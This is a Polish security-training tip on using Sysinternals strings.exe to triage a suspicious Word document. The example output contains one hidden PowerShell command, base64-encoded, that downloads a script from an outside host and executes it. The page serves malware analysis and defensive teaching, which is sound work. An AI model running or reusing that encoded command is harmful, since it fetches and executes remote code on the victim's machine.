alphasec academy

strings.exe z pakietu Sysinternals pomoże szybko analizować tekst w plikach binarnych

Dodatkowe informacje

Użytkownicy Unix/Linux na pewno dobrze znają polecenie strings, które wyciąga z pliku znaki drukowalne o określonej długości. Przydaje się np. do szybkiego odnalezienia zahardkowanych haseł w plikach binarnych czy innych ciekawych stringów w zrzutach pamięci etc. Dzięki Sysinternals dostępny jest odpowiednik dla Windows.

Przykładowe użycie

Powiedzmy, że otrzymaliśmy potencjalnie złośliwy dokument Microsoft Word i na szybko chcemy zobaczyć czy coś się rzuca w oczy. W tym celu z wykorzystaniem strings.exe wyciągamy drukowalne ciągi znaków o minimalnej długości 80:
PS C:\Users\drg\Downloads> .\Strings\strings.exe -n 80 malware.doc

Strings v2.53 - Search for ANSI and Unicode strings in binary images.
Copyright (C) 1999-2016 Mark Russinovich
Sysinternals - www.sysinternals.com


cmd /c powershell -w h -enc aQB3AHIAIABoAHQAdABwAHMAOgAvAC8AYQBwAHQAbQBjAC4AcABsAC8AYwBhAGwAYwB8AGkAZQB4AA==A@&
*\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\Program Files (x86)\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL
#Visual Basic For Applications
*\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\Program Files (x86)\Microsoft Office\Root\Office16\MSWORD.OLB#Microso
ft Word 16.0 Object Library
*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\Windows\SysWOW64\stdole2.tlb#OLE Automation
*\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\MSO.DLL#Mi
crosoft Office 16.0 Object Library
PS C:\Users\drg\Downloads>
Sami zadecydujcie czy coś ciekawego rzuca się w oczy.

Przydatne linki


Subskrybuj

Jeśli chcesz otrzymywać nowe, mięsiste protipy na maila, a także zostać czasem powiadomiony o wartościowych wydarzeniach - dołącz do subskrybentów.